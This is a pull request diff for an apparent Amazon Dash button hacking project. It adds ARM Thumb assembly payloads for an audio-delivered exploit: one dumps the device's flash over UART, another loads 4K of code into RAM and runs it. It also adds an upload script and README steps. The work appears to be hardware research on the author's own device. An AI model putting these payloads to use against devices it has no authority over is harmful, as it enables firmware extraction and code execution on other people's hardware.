### PR TITLE
Code upload and further samples

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -4,6 +4,11 @@
 *.obj
 *.elf
 
+# Binaries
+
+*.bin
+*.raw
+
 # Precompiled Headers
 *.gch
 *.pch
@@ -31,3 +36,7 @@
 # Debug files
 *.dSYM/
 *.su
+
+# Binary tools
+
+audio_exploit/fsk

--- a/audio_exploit/README.md
+++ b/audio_exploit/README.md
@@ -1,9 +1,11 @@
 # dashbtn
-needs arm-linux-gnueabihf- toolchain, lua, sox
+needs arm-none-eabi- toolchain, lua, sox
 
-Current payload for the exploit is a tiny chunk of code which dumps
-the flash and then lets the watchdog expire so the button shuts down
-afterwards. The asm source is in flashdump.s.
+You can download a suitable toolchain at 
+
+https://launchpad.net/gcc-arm-embedded
+
+The payload for the exploit is a tiny chunk of assembler code. 
 
 I assembled it with the gnu assembler arm-none-eabi-as flashdump.s and
 dumped it with objdump: arm-none-eabi-objdump -S a.out
@@ -26,3 +28,54 @@ the payload so that these words will be on the stack and can be pop'ed
 once the code runs. This is done for the uart tx function and some
 register locations - e.g. for the watchdog. This trick reduces the
 payload size a bit.
+
+
+
+There are several payload examples for the exploit available 
+as asm sources:
+
+
+flashdump.s:
+
+This is a tiny chunk of code which dumps the flash and then lets 
+the watchdog expire so the button shuts down afterwards. 
+
+This code uses an existing UART send routine from the original 
+firmware.
+
+
+flashdump_directuart.s:
+
+Same functionality as flashdump.s, but directly controls the UART
+
+
+code_upload.s:
+
+Small program to upload further program code over the UART.
+
+This program reads exactly 4K of data from the UART and writes the data
+into the RAM at address 0x20024000. It then directly jumps to the 
+base address of the uploaded code.
+
+The uploaded code should either be linked to upload base address 
+0x20024000 or it must be fully relocatable.
+
+A simple sample code and a helper script to compile and upload the
+program code from the host is added as well.
+
+Call 
+
+./play.sh code_upload.s 
+
+to upload the exploit code to the dashbutton. As soon as the LED stops
+dimming, run
+
+./upload.sh testcode_flashdump_directuart
+
+The sample code then will dump the flash content again.
+
+
+
+
+
+

--- a/audio_exploit/assemble.lua
+++ b/audio_exploit/assemble.lua
@@ -5,7 +5,7 @@ local chr = string.char
 local realm_start = 0x20020692 -- realm start in pkt buffer
 
 function load_asmfile(fn)
-	local prefix = "arm-linux-gnueabihf-"
+	local prefix = "arm-none-eabi-"
 	local opcodes, registers = {}, {0, 0, 0, 0, 0}
 	local fh = io.open(fn,"r")
 	-- extract register values from assembly comments

--- a/audio_exploit/code_upload.s
+++ b/audio_exploit/code_upload.s
@@ -1,0 +1,38 @@
+.syntax unified /* use unified assembler syntax */
+.code 16        /* assemble in Thumb-2  (.thumb" can also be used) */
+
+/*
+ register arguments:
+ 	R1: RAM address, where the code shall be uploaded to
+ 	R2: Code entry point
+ 	R3: UART 4 Base address (Control Register)
+	R4: Code end pointer
+	R5: Unused
+*/
+
+// r1 = 0x20024000 -- Start of last 16K of common RAM. R1 will be incremented during upload
+// r2 = 0x20024001 -- Start of uploaded code (same as the initial value of R1 + 1 to mark THUMB instruction set)
+// r3 = 0x4001C200 -- UART 4 CSR -- RHR has a offset of 4 and is located at 0x4001C218.
+// r4 = 0x20024FFF -- Code end pointer (4K of code)
+// r5 = 0x00000000 -- Unused
+	
+loop:
+
+wait_rxrdy:
+	/* send 1 byte */
+	/* Loop until CSR Bit 1 is set */
+
+	LDR     R6, [R3, #0x14]    // Load CSR to R6
+	ANDS    R6, #1             // Test if RXRDY Bit is set
+	BEQ     wait_rxrdy         // Loop until RXRDY is set
+		
+	// Load RHR content, store the byte into RAM and increment R1 by one
+	LDR     R7, [R3, #0x18]    
+	STRB.W  R7, [R1], #1
+
+	// Loop until we uploaded 4K
+	CMP 	R1, R4
+	BLS loop
+	
+	BX R2                      // Jump to start of uploaded code
+

--- a/audio_exploit/flashdump_directuart.s
+++ b/audio_exploit/flashdump_directuart.s
@@ -1,0 +1,45 @@
+.syntax unified /* use unified assembler syntax */
+.code 16        /* assemble in Thumb-2  (.thumb" can also be used) */
+
+/*
+ register arguments:
+ 	R1: src ptr
+ 	R2: UART 4 Transmit Holding Register
+ 	R3: UART 4 Channel Status Register
+	R4: watchdog dst
+	R5: watchdog value
+*/
+
+// r1 = 0x400000 -- flash start
+// r2 = 0x4001C21C -- UART 4 THR
+// r3 = 0x4001C214 -- UART 4 CSR
+// r4 = 0x400E1450 -- watchdog dst
+// r5 = 0xA5000001 -- watchdog value
+	
+loop:
+
+wait_csr:
+	/* send 1 byte */
+	/* Loop until CSR Bit 1 is set */
+
+	LDR     R6, [R3]  // Load CSR to R6
+	TST     R6, #2
+	BEQ     wait_csr
+	
+	/* Send R1 lowest byte to THR and increment R1 by one */
+	
+	LDRB.W  R7, [R1], #1
+	STRB    R7, [R2]
+
+	/* poke watchdog */
+	STR     R5, [R4]
+
+	/* check for end of flash */
+	MOVS	R6, R1, LSR #16
+	CMP		R6, #0x48
+	BNE loop
+	
+	/* let the watchdog expire */
+done:
+	B done
+

--- a/audio_exploit/testcode_flashdump_directuart.s
+++ b/audio_exploit/testcode_flashdump_directuart.s
@@ -1,0 +1,53 @@
+.syntax unified /* use unified assembler syntax */
+.code 16        /* assemble in Thumb-2  (.thumb" can also be used) */
+
+/*
+ register arguments:
+ 	R1: src ptr
+ 	R2: UART 4 Transmit Holding Register
+ 	R3: UART 4 Channel Status Register
+	R4: watchdog dst
+	R5: watchdog value
+*/
+
+// r1 = 0x400000 -- flash start
+// r2 = 0x4001C21C -- UART 4 THR
+// r3 = 0x4001C214 -- UART 4 CSR
+// r4 = 0x400E1450 -- watchdog dst
+// r5 = 0xA5000001 -- watchdog value
+
+    LDR     R1, =0x400000
+    LDR     R2, =0x4001C21C
+    LDR     R3, =0x4001C214
+    LDR     R4, =0x400E1450
+    LDR     R5, =0xA5000001
+    
+	
+loop:
+
+wait_csr:
+	/* send 1 byte */
+	/* Loop until CSR Bit 1 is set */
+
+	LDR     R6, [R3]  // Load CSR to R6
+	TST     R6, #2
+	BEQ     wait_csr
+	
+	/* Send R1 lowest byte to THR and increment R1 by one */
+	
+	LDRB.W  R7, [R1], #1
+//	STRB    R7, [R2]
+	STRB    R7, [R3, #8]
+
+	/* poke watchdog */
+	STR     R5, [R4]
+
+	/* check for end of flash */
+	MOVS	R6, R1, LSR #16
+	CMP		R6, #0x48
+	BNE loop
+	
+	/* let the watchdog expire */
+done:
+	B done
+

--- a/audio_exploit/testcode_flashdump_directuart.s
+++ b/audio_exploit/testcode_flashdump_directuart.s
@@ -16,11 +16,11 @@
 // r4 = 0x400E1450 -- watchdog dst
 // r5 = 0xA5000001 -- watchdog value
 
-    LDR     R1, =0x400000
-    LDR     R2, =0x4001C21C
-    LDR     R3, =0x4001C214
-    LDR     R4, =0x400E1450
-    LDR     R5, =0xA5000001
+	LDR     R1, =0x400000
+	LDR     R2, =0x4001C21C
+	LDR     R3, =0x4001C214
+	LDR     R4, =0x400E1450
+	LDR     R5, =0xA5000001
     
 	
 loop:
@@ -36,7 +36,6 @@ wait_csr:
 	/* Send R1 lowest byte to THR and increment R1 by one */
 	
 	LDRB.W  R7, [R1], #1
-//	STRB    R7, [R2]
 	STRB    R7, [R3, #8]
 
 	/* poke watchdog */

--- a/audio_exploit/upload.sh
+++ b/audio_exploit/upload.sh
@@ -1,0 +1,10 @@
+#!/bin/bash
+
+TOOLCHAIN_PREFIX=arm-none-eabi
+
+$TOOLCHAIN_PREFIX-as -mthumb $1.s -o $1.elf
+$TOOLCHAIN_PREFIX-objcopy -O binary $1.elf $1.bin
+
+truncate -s 4096 $1.bin
+
+cat $1.bin > /dev/ttyUSB0


### PR DESCRIPTION
These patches add:

* A payload sample that dumps the flash by directly controlling the UART 
  instead of re-using existing firmware code

* A payload sample to upload up to 4K of program code into RAM and execute it

* Some cleanups, additions to the readme and a few more entries to .gitignore
